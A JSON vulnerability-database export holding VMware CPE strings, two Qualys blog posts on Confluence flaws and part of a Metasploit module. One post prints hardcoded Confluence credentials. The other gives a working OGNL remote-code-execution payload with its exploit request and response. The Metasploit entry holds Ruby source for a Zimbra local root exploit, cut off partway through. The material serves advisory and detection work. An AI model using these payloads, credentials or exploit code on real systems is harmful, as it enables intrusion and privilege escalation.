"cpe:2.3:a:vmware:vcenter_server:6.5:update2b:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:b:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:a:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update1g:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update3g:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:c:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update3d:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update3k:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:e:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update1b:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update3f:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:d:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:a:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:c:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update2:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update3:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:-:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update2g:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:a:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update2c:*:*:*:*:*:*"]}], "qualysblog": [{"lastseen": "2022-08-19T00:02:03", 
"description": "Over the last few months, Atlassian Confluence has increasingly become a target for attackers. In June 2022, a critical severity OGNL Remote Code Execution vulnerability was disclosed (CVE-2022-26134). More recently, CVE-2022-26138 was disclosed on social media platforms in July 2022.\n\nIn CVE-2022-26138, a Confluence user account is created by the Questions for Confluence app with hardcoded credentials stored inside the plugin jar file available on [Atlassian packages](<https://packages.atlassian.com/maven-atlassian-external/com/atlassian/confluence/plugins/confluence-questions/3.0.2/>). An attacker with knowledge of these credentials could log into the Confluence application and access all contents within the confluence-users group. [Atlassian](<https://confluence.atlassian.com/doc/questions-for-confluence-security-advisory-2022-07-20-1142446709.html>) has rated the vulnerability "critical" and highlighted that the vulnerability is being exploited in the wild.\n\nDue to the nature of this vulnerability, it can only be verified remotely by logging into the Confluence application with the hardcoded credentials. Traditional open source scanners and scripts are checking for the Location HTTP response header and 302 status code to verify the credentials, which could result in false positives. [Qualys Web Application Scanning](<https://www.qualys.com/apps/web-app-scanning/>) has released QID 150556 that confirms the vulnerability detection in two steps. The detection takes an additional step to verify the valid credentials by navigating to the user profile page and verifying that the correct page is returned. 
This check is much more efficient in comparison to open source scanners and eliminates any possibility of false positives.\n\n## About CVE-2022-26138\n\nAccording to Confluence's [Questions for Confluence Security Advisory](<https://confluence.atlassian.com/doc/questions-for-confluence-security-advisory-2022-07-20-1142446709.html>), both Confluence Server and Confluence Data Center products using affected versions of the Questions for Confluence app are impacted by CVE-2022-26138.\n\nAffected versions :\n\nQuestions for Confluence 2.7.x| 2.7.34 \n2.7.35 \n---|--- \nQuestions for Confluence 3.0.x| 3.0.2 \n \n## Hardcoded Credentials Vulnerability\n\nAffected versions of the Questions for Confluence app, when installed on a Confluence application, create a user account with username `disabledsystemuser` and password `disabled1system1user6708` and the account is added to confluence-users group, which allows viewing and editing all non-restricted pages within Confluence [by default](<https://confluence.atlassian.com/doc/confluence-groups-139478.html>). A remote attacker can easily leverage these credentials to browse sensitive contents within the Confluence application.\n\nThese hardcoded credentials are stored in `default.properties` file inside a [`confluence-questions-X.X.X.jar` file](<https://packages.atlassian.com/maven-atlassian-external/com/atlassian/confluence/plugins/confluence-questions/3.0.2/>), as shown below.\n\n\n\n## Detecting the Vulnerability with Qualys Web Application Scanning\n\nExisting Qualys customers can detect CVE-2022-26138 on their target Confluence instance with Qualys Web Application Scanning (WAS) using the following Qualys ID (QID):\n\n * 150556 : Atlassian Confluence Server and Data Center : Questions for Confluence App - Hardcoded Credentials (CVE-2022-26138)\n\nThe QID is part of the core category. 
A vulnerability scan with a core or custom search list including the QID in the options profile will flag all vulnerable applications, as shown below.\n\n\n\n### Qualys WAS Report\n\nOnce the vulnerability is successfully detected by Qualys WAS, the user will see similar results in the vulnerability scan report, as shown here:\n\n\n\n### Solution & Mitigation\n\nTo remediate this vulnerability, any organization using the Questions for Confluence app is advised to ensure the following:\n\n * Upgrade to Version 2.7.x >= 2.7.38 (compatible with Confluence 6.13.18 through 7.16.2) and Versions >= 3.0.5 (compatible with Confluence 7.16.3 and later)\n * Disable or delete the disabledsystemuser account\n\nPlease note that uninstalling the Questions for Confluence app does not remediate this vulnerability. The disabledsystemuser account does not automatically get removed after the app has been uninstalled. It is possible for this account to be present if the Questions for Confluence app was previously installed. 
It is advised to check the list of active users to ensure the Confluence instance is not affected.\n\n### Credit\n\n**Confluence Security Advisory:** <https://confluence.atlassian.com/doc/questions-for-confluence-security-advisory-2022-07-20-1142446709.html>\n\n### CVE Details:\n\n * <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26138>\n * <https://nvd.nist.gov/vuln/detail/CVE-2022-26138>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-17T10:12:53", "type": "qualysblog", "title": "Atlassian Confluence: Questions for Confluence App Hardcoded Credentials Vulnerability (CVE-2022-26138)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134", "CVE-2022-26138"], "modified": "2022-08-17T10:12:53", "id": "QUALYSBLOG:F9C2629D40A6DC7640DB3D6BD4FB60B3", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-29T21:59:19", "description": "On June 02, 2022, Atlassian published a [security 
advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) about a critical severity Unauthenticated Remote Code Execution vulnerability affecting Confluence Server and Data Center. According to the advisory, the vulnerability is being actively exploited and Confluence Server and Data Center versions after 1.3.0 are affected. The vulnerability is tracked as [CVE-2022-26134](<https://nvd.nist.gov/vuln/detail/CVE-2022-26134>) with 9.8 CVSSv3 score with multiple proof of concept exploits released by security researchers on GitHub. \n\n[Qualys Web Application Scanning](<https://www.qualys.com/apps/web-app-scanning/>) released QID 150523 on June 08, 2022, to detect CVE-2022-26134, the detection sends HTTP GET request with a specially crafted OGNL payload to determine the vulnerability on the target Confluence application. The OGNL payload creates a custom HTTP response header containing the output of the system command executed on Linux and Windows systems. The detection also consists of a Qualys customized OGNL payload which is platform-independent, eliminating false positives and works irrespective of the host operating system by creating a custom HTTP response header with Qualys specified value.\n\n## About CVE-2022-26134\n\nCVE-2022-26134 is an unauthenticated OGNL Injection remote code execution vulnerability affecting Confluence Server and Data Center versions after 1.3.0. In order to exploit a vulnerable server, a remote attacker can send a malicious HTTP GET request with an OGNL payload in the URI. The vulnerable server once exploited it would allow the attacker to execute commands remotely with user privileges running the Confluence application. 
The vulnerability is fixed in Confluence versions 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1.\n\n### OGNL Injection\n\nObject-Graph Navigation Language (OGNL) is an open-source Expression Language (EL) used for getting and setting the properties of Java objects. An OGNL Injection occurs when there is insufficient validation of user-supplied data, and the EL interpreter attempts to interpret it enabling attackers to inject their own EL code.\n\nIn the case of CVE-2022-26134, the RCE attack is not complex in nature. The attack can be executed by simply sending the OGNL payload in the request URI. The payload can be crafted to add a custom HTTP response header that prints the output of successfully executed remote commands.\n\nRCE Payload\n \n \n ${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(\"id\").getInputStream(),\"utf-8\")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader(\"X-Qualys-Response\",#a))}\n\nBreaking the above payload, variable `a` is assigned the value of an expression which calls various static methods using syntax `@class@method(args)`, where `java.lang.Runtime` class calls `exec` method which executes `id` command and the output is stored in the variable `a`.\n\nNext, from package `com.opensymphony.xwork2` class `ServletActionContext` is called which uses `getResponse` and `setHeader` method to fetch response of `id` system command in `X-Qualys-Response` custom header.\n\n### Exploit POC\n\nREQUEST\n \n \n GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Qualys-Response%22%2C%23a%29%29%7D/ HTTP/1.1\n Host: 127.0.0.1:8090\n User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0\n Accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Connection: close\n Upgrade-Insecure-Requests: 1\n\nRESPONSE\n \n \n HTTP/1.1 302 \n Cache-Control: no-store\n Expires: Thu, 01 Jan 1970 00:00:00 GMT\n X-Confluence-Request-Time: 1655819234897\n Set-Cookie: JSESSIONID=7AE586C9E49E2301BA33E5A1552D8C6F; Path=/; HttpOnly\n X-XSS-Protection: 1; mode=block\n X-Content-Type-Options: nosniff\n X-Frame-Options: SAMEORIGIN\n Content-Security-Policy: frame-ancestors 'self'\n X-Qualys-Response: uid=2002(confluence) gid=2002(confluence) groups=2002(confluence)\n Location: /login.action?os_destination=%2F%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Qualys-Response%22%2C%23a%29%29%7D%2Findex.action&permissionViolation=true\n Content-Type: text/html;charset=UTF-8\n Content-Length: 0\n Date: Tue, 21 Jun 2022 13:47:14 GMT\n Connection: close\n\nOnce the exploit is triggered it can be seen `X-Qualys-Response` HTTP response header contains the output of the `id` system command resulting in successful exploitation of this remote code execution vulnerability.\n\n## Exploit Analysis\n\nWhile analyzing the above RCE request, the Qualys WAS research team came across the Catalina log file in Confluence Server stored at `/opt/atlassian/confluence/logs/catalina.YYYY-MM-DD.log` which had multiple entries of web requests sent, along with output from `stdout` and `stderr`. 
Following is the snippet from the log file printing stack trace for the RCE request:\n\n* * *\n \n \n 07-Jun-2022 10:37:00.565 WARNING [Catalina-utility-4] org.apache.catalina.valves.StuckThreadDetectionValve.notifyStuckThreadDetected Thread [http-nio-8090-exec-17] (id=[347]) has been active for [75,417] milliseconds (since [6/7/22 10:35 AM]) to serve the same request for [http://127.0.0.1:8090/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Qualys-Response%22%2C%23a%29%29%7D/] and may be stuck (configured threshold for this StuckThreadDetectionValve is [60] seconds). There is/are [1] thread(s) in total that are monitored by this Valve and\n may be stuck.\n java.lang.Throwable\n at org.apache.catalina.loader.WebappClassLoaderBase.loadClass(WebappClassLoaderBase.java:1247)\n at org.apache.catalina.loader.WebappClassLoaderBase.loadClass(WebappClassLoaderBase.java:1215)\n at ognl.OgnlParser.primaryExpression(OgnlParser.java:1494)\n at ognl.OgnlParser.navigationChain(OgnlParser.java:1245)\n [..SNIP..]\n at ognl.Ognl.parseExpression(Ognl.java:113)\n at com.opensymphony.xwork.util.OgnlUtil.compile(OgnlUtil.java:196)\n at com.opensymphony.xwork.util.OgnlValueStack.findValue(OgnlValueStack.java:141)\n at com.opensymphony.xwork.util.TextParseUtil.translateVariables(TextParseUtil.java:39)\n at com.opensymphony.xwork.ActionChainResult.execute(ActionChainResult.java:95)\n at com.opensymphony.xwork.DefaultActionInvocation.executeResult(DefaultActionInvocation.java:263)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:187)\n at com.atlassian.confluence.xwork.FlashScopeInterceptor.intercept(FlashScopeInterceptor.java:21)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at 
com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.confluence.core.actions.LastModifiedInterceptor.intercept(LastModifiedInterceptor.java:27)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.confluence.core.ConfluenceAutowireInterceptor.intercept(ConfluenceAutowireInterceptor.java:44)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.xwork.interceptors.TransactionalInvocation.invokeAndHandleExceptions(TransactionalInvocation.java:61)\n at com.atlassian.xwork.interceptors.TransactionalInvocation.invokeInTransaction(TransactionalInvocation.java:51)\n at com.atlassian.xwork.interceptors.XWorkTransactionInterceptor.intercept(XWorkTransactionInterceptor.java:50)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.confluence.xwork.SetupIncompleteInterceptor.intercept(SetupIncompleteInterceptor.java:61)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.confluence.security.interceptors.SecurityHeadersInterceptor.intercept(SecurityHeadersInterceptor.java:26)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.opensymphony.xwork.DefaultActionProxy.execute(DefaultActionProxy.java:115)\n at 
com.atlassian.confluence.servlet.ConfluenceServletDispatcher.serviceAction(ConfluenceServletDispatcher.java:56)\n at com.opensymphony.webwork.dispatcher.ServletDispatcher.service(ServletDispatcher.java:199)\n at javax.servlet.http.HttpServlet.service(HttpServlet.java:764)\n at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:227)\n at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\n at org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:53)\n [..SNIP..]\n at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)\n at java.base@11.0.15/java.lang.Thread.run(Thread.java:829)\n\n* * *\n\nAnalyzing the stack, `com.opensymphony.webwork.dispatcher.ServletDispatcher.service(ServletDispatcher.java:199)` appears to be the source where the injection occurs. The execution flows up to ` com.opensymphony.xwork.ActionChainResult.execute(ActionChainResult.java:95)` where [`execute`](<https://struts.apache.org/maven/struts2-core/apidocs/com/opensymphony/xwork2/ActionChainResult.html>) method calls` [translateVariables](<https://struts.apache.org/maven/struts2-core/apidocs/index.html?com/opensymphony/xwork2/util/TextParseUtil.html>)` method from [`TextParseUtil`](<https://struts.apache.org/maven/struts2-core/apidocs/index.html?com/opensymphony/xwork2/util/TextParseUtil.html>) class ` com.opensymphony.xwork.util.TextParseUtil.translateVariables(TextParseUtil.java:39)` which appears to be sink where the OGNL expression evaluation takes place invoking [`findValue`](<https://struts.apache.org/maven/struts2-core/apidocs/com/opensymphony/xwork2/ognl/OgnlValueStack.html#findValue-java.lang.String->) method from `OgnlValueStack` class `com.opensymphony.xwork.util.OgnlValueStack.findValue(OgnlValueStack.java:141)` and goes forward parsing the OGNL expression with `com.opensymphony.xwork.util.OgnlUtil.compile(OgnlUtil.java:196)` and multiple other classes.\n\n### 
Source Code Analysis\n\nTo have a better understanding of the execution flow of this RCE vulnerability, it's important that we dive into the source code of these classes:\n\nStarting off with [`ServletDispatcher`](<https://docs.atlassian.com/DAC/javadoc/opensymphony-webwork/1.4-atlassian-17/reference/webwork/dispatcher/ServletDispatcher.html>) class:\n \n \n public static String getNamespaceFromServletPath(String servletPath) {\n servletPath = servletPath.substring(0, servletPath.lastIndexOf(\"/\"));\n return servletPath;\n }\n \n\nServletDispatcher\n\nThe `getNamespaceFromServletPath` is used to obtain the namespace to which an Action belongs.\n\nFor example : When a malicious request `http://127.0.0.1:8090/<RCE payload>/` is fired, the line ` servletPath.substring(0, servletPath.lastIndexOf(\"/\"));` will consider everything before the last trailing slash as a namespace. Hence namespace `<RCE payload>` is created from the malicious requested URI.\n\nAs a result, the last trailing slash is an essential component for the exploit to work, if omitted the payload won\u2019t work.\n\nThis namespace is further utilized by `execute` method using `this.namespace` expression inside [`ActionChainResult`](<https://struts.apache.org/maven/struts2-core/apidocs/com/opensymphony/xwork2/ActionChainResult.html>):\n \n \n public void execute(final ActionInvocation invocation) throws Exception {\n if (this.namespace == null) {\n this.namespace = invocation.getProxy().getNamespace();\n }\n final OgnlValueStack stack = ActionContext.getContext().getValueStack();\n final String finalNamespace = TextParseUtil.translateVariables(this.namespace, stack);\n final String finalActionName = TextParseUtil.translateVariables(this.actionName, stack);\n if (this.isInChainHistory(finalNamespace, finalActionName)) {\n throw new XworkException(\"infinite recursion detected\");\n }\n \n\nActionChainResult\n\nHere, `translateVariables` method from `TextParseUtil` class is called on `this.namespace` 
expression which converts all instances of `${...}` in expression to the value returned by a call to `OgnlValueStack.findValue`.\n\nGoing forward with [`TextParseUtil`](<https://struts.apache.org/maven/struts2-core/apidocs/index.html?com/opensymphony/xwork2/util/TextParseUtil.html>) class code:\n \n \n package com.opensymphony.xwork.util;\n \n import java.util.regex.Matcher;\n import java.util.regex.Pattern;\n \n public class TextParseUtil\n {\n public static String translateVariables(final String expression, final OgnlValueStack stack) {\n final StringBuilder sb = new StringBuilder();\n final Pattern p = Pattern.compile(\"\\\\$\\\\{([^}]*)\\\\}\");\n final Matcher m = p.matcher(expression);\n int previous = 0;\n while (m.find()) {\n final String g = m.group(1);\n final int start = m.start();\n String value;\n try {\n final Object o = stack.findValue(g);\n value = ((o == null) ? \"\" : o.toString());\n }\n catch (Exception ignored) {\n value = \"\";\n }\n sb.append(expression.substring(previous, start)).append(value);\n previous = m.end();\n }\n if (previous < expression.length()) {\n sb.append(expression.substring(previous));\n }\n return sb.toString();\n }\n }\n \n\nTextParseUtil\n\n[`translateVariables`](<https://struts.apache.org/maven/struts2-core/apidocs/index.html?com/opensymphony/xwork2/util/TextParseUtil.html>) method here takes two parameters `expression` which is basically a string which hasn\u2019t been translated and secondly a `value stack` which allows dynamic OGNL expressions to be evaluated against it.\n\nInside `final Pattern p = Pattern.compile(\"\\\\$\\\\{([^}]*)\\\\}\");` class `Pattern` defines a pattern to be searched and then it\u2019s created using `Pattern.compile()` method.\n\nIn Java `\\` single backslash is an escape character for strings. 
Hence the double backslash `\\\\` is used in the regex `\\\\$\\\\{([^}]*)\\\\}` to escape the `$`, `{` and `}` characters.\n\nThe next line, `final Matcher m = p.matcher(expression);`, uses the `matcher()` method to search the input string for that pattern, for example a string such as `${qualys.rce.payload}`.\n\nThe contents of the round brackets (the capturing group) in the regular expression `\\\\$\\\\{([^}]*)\\\\}` are then extracted with `final String g = m.group(1);` and passed to `final Object o = stack.findValue(g);`.\n\nAnd finally, [`findValue`](<https://struts.apache.org/maven/struts2-core/apidocs/com/opensymphony/xwork2/ognl/OgnlValueStack.html#findValue-java.lang.String->) finds the value by evaluating the given expression against the stack in the default search order.\n\nAs a result, when a remote attacker makes a malicious request URI `http://127.0.0.1:8090/${rce_payload}/`, `${rce_payload}` is first turned into a namespace; `TextParseUtil.translateVariables` then extracts the payload, and `findValue` evaluates the OGNL expression `rce_payload`, causing Remote Code Execution.\n\n## Detecting the Vulnerability with Qualys WAS\n\nCustomers can detect this vulnerability on the target Confluence application with Qualys Web Application Scanning using the following QID:\n\n * 150523: Atlassian Confluence Server and Data Center OGNL Injection Remote Code Execution (RCE) Vulnerability (CVE-2022-26134)\n\n\n### Qualys WAS Report\n\nOnce the vulnerability is successfully detected, users will see the following results in the vulnerability scan report:\n\n\n\n## Solution\n\nDue to the Critical severity and active exploitation of this vulnerability, organizations using Confluence are strongly advised to upgrade to version 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4, 7.18.1 or later to remediate CVE-2022-26134. 
More information regarding patching and workarounds is available in the [Confluence Security Advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>).\n\n## Credits\n\n**Confluence Security Advisory:** <https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>\n\n**CVE Details:**\n\n * <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26134>\n * <https://nvd.nist.gov/vuln/detail/CVE-2022-26134>\n\nCredit for the vulnerability discovery goes to [Volexity](<https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/>).\n\n**References:**\n\n * <https://twitter.com/ptswarm/status/1533805332409069568/photo/1>\n\n### Contributors\n\n * **Sheela Sarva**, Director, Quality Engineering, Web Application Security, Qualys\n * **Rajesh Kumbhar**, Senior Software Engineer, Qualys", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-29T20:23:28", "type": "qualysblog", "title": "Atlassian Confluence OGNL Injection Remote Code Execution (RCE) Vulnerability (CVE-2022-26134)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-29T20:23:28", "id": "QUALYSBLOG:027905A1E6C979D272DF11DDA2FC9F8F", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2023-06-03T15:23:51", "description": "This module exploits CVE-2022-37393, which is a vulnerability in Zimbra's sudo configuration that permits the zimbra user to execute the zmslapd binary as root with arbitrary parameters. As part of its intended functionality, zmslapd can load a user-defined configuration file, which includes plugins in the form of .so files, which also execute as root.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-05T18:55:05", "type": "metasploit", "title": "Zimbra zmslapd arbitrary module load", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:L/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-37393"], "modified": "2023-03-27T15:46:07", "id": "MSF:EXPLOIT-LINUX-LOCAL-ZIMBRA_SLAPPER_PRIV_ESC-", "href": "https://www.rapid7.com/db/modules/exploit/linux/local/zimbra_slapper_priv_esc/", "sourceData": 
"##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Post::Linux::Compile\n include Msf::Post::Linux::Kernel\n include Msf::Post::File\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Zimbra zmslapd arbitrary module load',\n 'Description' => %q{\n This module exploits CVE-2022-37393, which is a vulnerability in\n Zimbra's sudo configuration that permits the zimbra user to execute\n the zmslapd binary as root with arbitrary parameters. As part of its\n intended functionality, zmslapd can load a user-defined configuration\n file, which includes plugins in the form of .so files, which also\n execute as root.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Darren Martyn', # discovery and poc\n 'Ron Bowes', # Module\n ],\n 'DisclosureDate' => '2021-10-27',\n 'Platform' => [ 'linux' ],\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\n 'Privileged' => true,\n 'References' => [\n [ 'CVE', '2022-37393' ],\n [ 'URL', 'https://web.archive.org/web/20221002011602/https://darrenmartyn.ie/2021/10/27/zimbra-zmslapd-local-root-exploit/' ],\n ],\n 'Targets' => [\n [ 'Auto', {} ],\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ],\n 'SideEffects' => [ IOC_IN_LOGS ]\n }\n )\n )\n register_options [\n OptString.new('SUDO_PATH', [ true, 'Path to sudo executable', 'sudo' ]),\n OptString.new('ZIMBRA_BASE', [ true, \"Zimbra's installation directory\", '/opt/zimbra' ]),\n ]\n register_advanced_options [\n OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])\n ]\n end\n\n # 
Because this isn't patched, I can't say with 100% certainty that this will\n # detect a future patch (it depends on how they patch it)\n def check\n # Sanity check\n if is_root?\n fail_with(Failure::None, 'Session already has root privileges')\n end\n\n unless file_exist?(\"#{datastore['ZIMBRA_BASE']}/libexec/zmslapd\")\n print_error(\"zmslapd executable not detected: #{datastore['ZIMBRA_BASE']}/libexec/zmslapd (set ZIMBRA_BASE if Zimbra is installed in an unusual location)\")\n return CheckCode::Safe\n end\n\n unless command_exists?(datastore['SUDO_PATH'])\n print_error(\"Could not find sudo: #{datastore['SUDOPATH']} (set SUDO_PATH if sudo isn't in $PATH)\")\n return CheckCode::Safe\n end\n\n # Run `sudo -n -l` to make sure we have access to the target command\n cmd = \"#{datastore['SUDO_PATH']} -n -l\"\n print_status \"Executing: #{cmd}\"\n output = cmd_exec(cmd).to_s\n\n if !output || output.start_with?('usage:') || output.include?('illegal option') || output.include?('a password is required')\n print_error('Current user could not execute sudo -l')\n return CheckCode::Safe\n end\n\n if !output.include?(\"(root) NOPASSWD: #{datastore['ZIMBRA_BASE']}/libexec/zmslapd\")\n print_error('Current user does not have access to run zmslapd')\n return CheckCode::Safe\n end\n\n CheckCode::Appears\n end\n\n def exploit\n base_dir = datastore['WritableDir'].to_s\n unless writable?(base_dir)\n fail_with(Failure::BadConfig, \"#{base_dir} is not writable\")\n end\n\n # Generate a random directory\n exploit_dir = \"#{base_dir}/.#{rand_text_alphanumeric(5..10)}\"\n if file_exist?(exploit_dir)\n fail_with(Failure::BadConfig, 'Exploit dir already exists')\n end\n\n # Create the directory and get ready to remove it\n print_status(\"Creating exploit directory: #{exploit_dir}\")\n mkdir(exploit_dir)\n register_dir_for_cleanup(exploit_dir)\n\n # Generate some filenames\n library_name = \".#{rand_text_alphanumeric(5..10)}.so\"\n library_path = \"#{exploit_dir}/#{library_name}\"\n 
